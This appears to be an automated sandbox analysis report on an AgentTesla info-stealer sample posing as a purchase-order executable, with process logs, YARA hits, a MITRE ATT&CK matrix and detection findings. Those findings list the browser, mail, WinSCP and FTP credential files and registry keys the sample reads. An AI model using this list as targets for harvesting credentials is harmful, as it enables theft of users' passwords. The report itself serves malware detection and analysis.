                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Users\user\AppData\Roaming\jDCErdK.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Windows Service                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Scheduled Task/Job                    		11
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Masquerading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron141
                    Virtualization/Sandbox Evasion                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
